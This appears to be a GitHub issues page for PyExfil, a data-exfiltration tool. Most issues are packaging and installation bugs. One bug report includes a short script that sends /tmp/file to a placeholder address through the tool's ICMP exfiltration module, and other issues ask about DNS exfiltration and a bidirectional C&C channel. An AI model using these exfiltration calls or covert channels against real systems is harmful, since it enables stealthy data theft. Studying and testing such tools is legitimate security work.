
pyexfil's Issues

Scapy

Hello ytisf, I don't know where to put my question, but why don't you use scapy for the exfiltration? (Thanks for the zoo, by the way.)

Set zip_safe flag to True in setup.py setup()

Should this package be installed with the zip_safe flag set to true?

See here:

http://peak.telecommunity.com/DevCenter/setuptools#setting-the-zip-safe-flag

Note:
For maximum performance, Python packages are best installed as zip files. Not all packages, however, are capable of running in compressed form, because they may expect to be able to access either source code or data files as normal operating system files. So, setuptools can install your project as a zipfile or a directory, and its default choice is determined by the project's zip_safe flag.

You can pass a True or False value for the zip_safe argument to the setup() function, or you can omit it. If you omit it, the bdist_egg command will analyze your project's contents to see if it can detect any conditions that would prevent it from working in a zipfile. It will output notices to the console about any such conditions that it finds.

Currently, this analysis is extremely conservative: it will consider the project unsafe if it contains any C extensions or datafiles whatsoever. This does not mean that the project can't or won't work as a zipfile! It just means that the bdist_egg authors aren't yet comfortable asserting that the project will work. If the project contains no C or data files, and does no file or path introspection or source code manipulation, then there is an extremely solid chance the project will work when installed as a zipfile. (And if the project uses pkg_resources for all its data file access, then C extensions and other data files shouldn't be a problem at all. See the Accessing Data Files at Runtime section above for more information.)

However, if bdist_egg can't be sure that your package will work, but you've checked over all the warnings it issued, and you are either satisfied it will work (or if you want to try it for yourself), then you should set zip_safe to True in your setup() call. If it turns out that it doesn't work, you can always change it to False, which will force setuptools to install your project as a directory rather than as a zipfile.

Of course, the end-user can still override either decision, if they are using EasyInstall to install your package. And, if you want to override for testing purposes, you can just run setup.py easy_install --zip-ok . or setup.py easy_install --always-unzip . in your project directory to install the package as a zipfile or directory, respectively.

In the future, as we gain more experience with different packages and become more satisfied with the robustness of the pkg_resources runtime, the "zip safety" analysis may become less conservative. However, we strongly recommend that you determine for yourself whether your project functions correctly when installed as a zipfile, correct any problems if you can, and then make an explicit declaration of True or False for the zip_safe flag, so that it will not be necessary for bdist_egg or EasyInstall to try to guess whether your project can work as a zipfile.

File name save

The file name is currently generated, but it needs to use the real file name. Currently there is some issue with encoding.

Verify all files

Need to check all file formats and not just PNG to make sure all data are moving

Installation fails because zlib is not installed

I am failing to install PyExfil with pip (pip install --user PyExfil); it fails due to the following error:

➜  pip install --user PyExfil
Collecting PyExfil
  Using cached PyExfil-1.10.4.tar.gz (5.2 kB)
  Preparing metadata (setup.py) ... done
Requirement already satisfied: requests>=1.0.0 in /home/oma/.pyenv/versions/3.11.2/lib/python3.11/site-packages (from PyExfil) (2.28.2)
Collecting impacket>=0.9.0 (from PyExfil)
  Using cached impacket-0.11.0-py3-none-any.whl
Collecting slackclient (from PyExfil)
  Using cached slackclient-2.9.4-py2.py3-none-any.whl (97 kB)
Requirement already satisfied: progressbar in /home/oma/.pyenv/versions/3.11.2/lib/python3.11/site-packages (from PyExfil) (2.5)
INFO: pip is looking at multiple versions of pyexfil to determine which version is compatible with other requirements. This could take a while.
Collecting PyExfil
  Using cached PyExfil-1.3-py3-none-any.whl (2.5 kB)
ERROR: Cannot install pyexfil==1.10.4 and pyexfil==1.3 because these package versions have conflicting dependencies.

The conflict is caused by:
    pyexfil 1.10.4 depends on zlib
    pyexfil 1.3 depends on zlib

To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip attempt to solve the dependency conflict

ERROR: ResolutionImpossible: for help visit https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-dependency-conflicts

The zlib library is a module from the standard library (link) and I have installed both packages (zlib1g zlib1g-dev) recommended by different Stack Overflow questions. So the requirement should be fulfilled.

Info about my system:

  • Kali on WSL (Windows subsystem for Linux)
VERSION_ID="2023.3"
VERSION="2023.3"
VERSION_CODENAME=kali-rolling
  • Python version: Python 3.11.2

Could not find a version that satisfies the requirement ftplib

pip3 install pyExfil
Collecting pyExfil
Downloading PyExfil-1.10.4.tar.gz (5.2 kB)
Requirement already satisfied: Pillow in /usr/lib/python3/dist-packages (from pyExfil) (7.0.0)
Requirement already satisfied: PyCrypto in /usr/lib/python3/dist-packages (from pyExfil) (2.6.1)
Collecting base58
Downloading base58-2.0.1-py3-none-any.whl (4.3 kB)
ERROR: Could not find a version that satisfies the requirement ftplib (from pyExfil) (from versions: none)
ERROR: No matching distribution found for ftplib (from pyExfil)

My Python version is -
Python 3.8.5
and pip version is -
pip 20.0.2

Clean install doesn't work

I'm trying to use PyExfil and I'm having several problems starting from a clean install (Python 3.9.1, Linux).

I'm following the instructions in the README:

git clone https://www.github.com/ytisf/PyExfil
cd PyExfil
pip install --user -r requirements.txt

except with pip install -r requirements3.txt because I'm in a venv and requirements.txt doesn't exist. I also removed the librosa (audio analysis) dependency since in turn it depended on llvm-libs.

The readme then specifies pip setup.py --user install (that should be python). I'm getting error: option --user not recognized, so I drop it. Python then says:

Processing dependencies for PyExfil==1.3
Searching for urllib2
Reading https://pypi.org/simple/urllib2/
Couldn't find index page for 'urllib2' (maybe misspelled?)
Scanning index of all packages (this may take a while)
Reading https://pypi.org/simple/
No local packages or working download links found for urllib2
error: Could not find suitable distribution for Requirement.parse('urllib2')

It is actually a Python 2 standard library so I removed the requirement; note however that it is still used in HTTPS and QUIC.

Likewise for hashlib, although with a more cryptic error.

The installation then proceeds successfully, but I can't import anything from the package:

Traceback (most recent call last):
  File "/home/yuri/codice/bizarre-net/socket/pyexfil-bridge.py", line 3, in <module>
    from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener
ModuleNotFoundError: No module named 'pyexfil.network'

Indeed, importing it in the REPL shows that it only exports AUTHORS, NAME and a few other variables.

I then tried installing it "manually" by copying the pyexfil directory to where I needed it. I then found out that even a simple usage doesn't work:

#!/usr/bin/python

from pyexfil.network.ICMP.icmp_exfiltration import send_file, init_listener

send_file("1.2.3.4", file_path="/tmp/file")

Traceback (most recent call last):
  File "/home/yuri/codice/bizarre-net/socket/pyexfil-bridge.py", line 5, in <module>
    send_file("1.2.3.4", file_path="/tmp/file")
  File "/home/yuri/codice/bizarre-net/socket/pyexfil/network/ICMP/icmp_exfiltration.py", line 76, in send_file
    icmp.contains(ImpactPacket.Data(current_packet))
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 485, in __init__
    self.set_data(aBuffer)
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 488, in set_data
    self.set_bytes_from_string(data)
  File "/home/yuri/codice/bizarre-net/socket/venv/lib/python3.9/site-packages/impacket/ImpactPacket.py", line 59, in set_bytes_from_string
    self.__bytes = array.array('B', data)
TypeError: cannot use a str to initialize an array with typecode 'B'

I believe this error is caused by my version of impacket being too recent, as there are no specific constraints in requirements.txt or setup.py. I think the author will need to freeze the packages to known-good versions.
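The three installation reports above (zlib, ftplib, and urllib2/hashlib) share one cause: standard-library module names listed as installable requirements. The following check is an added example, not part of the original issues or of PyExfil; the helper names and the sample list are assumptions made for illustration.

```python
import re
import sys

# Modules shipped with the running interpreter (Python 3.10+ exposes the list).
# The fallback tuple is a small constructed subset for older interpreters.
PY3_STDLIB = frozenset(
    n.lower() for n in getattr(
        sys, "stdlib_module_names", ("zlib", "ftplib", "hashlib", "socket", "sys")
    )
)
# Python 2-only standard-library names (hand-picked, not exhaustive).
PY2_ONLY_STDLIB = frozenset({"urllib2", "urlparse", "httplib", "cookielib", "cpickle"})

_NAME = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")


def requirement_name(line):
    """Return the lower-cased project name of one requirement line, or None."""
    match = _NAME.match(line.split("#", 1)[0])  # drop trailing comments
    if match is None:  # blank line, comment, or an option such as "-r other.txt"
        return None
    return match.group(1).lower().replace("-", "_")


def audit(requirements):
    """Return (name, reason) for every entry that names a stdlib module."""
    findings = []
    for line in requirements:
        name = requirement_name(line)
        if name in PY3_STDLIB:
            findings.append((name, "stdlib"))
        elif name in PY2_ONLY_STDLIB:
            findings.append((name, "python2-stdlib"))
    return findings


# Constructed sample: names taken from the pip output quoted in the reports above,
# not a copy of the project's setup.py or requirements files.
SAMPLE = [
    "requests>=1.0.0", "impacket>=0.9.0", "slackclient", "progressbar",
    "zlib", "ftplib", "urllib2", "hashlib",
]

if __name__ == "__main__":
    for name, reason in audit(SAMPLE):
        print(f"{name}: {reason}, remove from install_requires")
```

Entries flagged this way ship with the interpreter (or only existed in Python 2), so pip cannot resolve them from the index; run as a pre-release check, it catches the problem before a broken sdist is published.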

PyExfil tool into DNS queries working

To ytisf,

Hi, I'm a visitor who's looking at your tool (PyExfil), and I would like to ask you about how the tool works.
How could I contact you privately? Please provide your email or contact information. I'm studying DNS data exfiltration from DNS traffic, and your tool is interesting to me.

I'm looking forward to your answer, please help me.

Inserted comma instead of 'as'

At lines 118 and 125, the code snippet

except socket.error, msg:

should be replaced with

except socket.error as msg:

    except socket.error, msg :
        sys.stderr.write('Failed to create socket. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])
        raise
    # Try binding to the socket
    try:
        s.bind((host, port))
    except socket.error, msg:
        sys.stderr.write('Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1])

Bidirectional channel?

Could this be extended to be a bidirectional C&C channel, or is it just for sending output at the moment?

Apologies if silly question, have not yet had time to RTFC :P but seriously, nice work :D

Argument Handling

Currently it does none.
Need to get the destination IP & the file to exfiltrate as arguments.

Monkey Code

Nope. Not code monkey. Both of these were developed in a hurry and too late at night. It literally looks like a monkey with a keyboard wrote them. Need to write it in a way which will less resemble assembly.
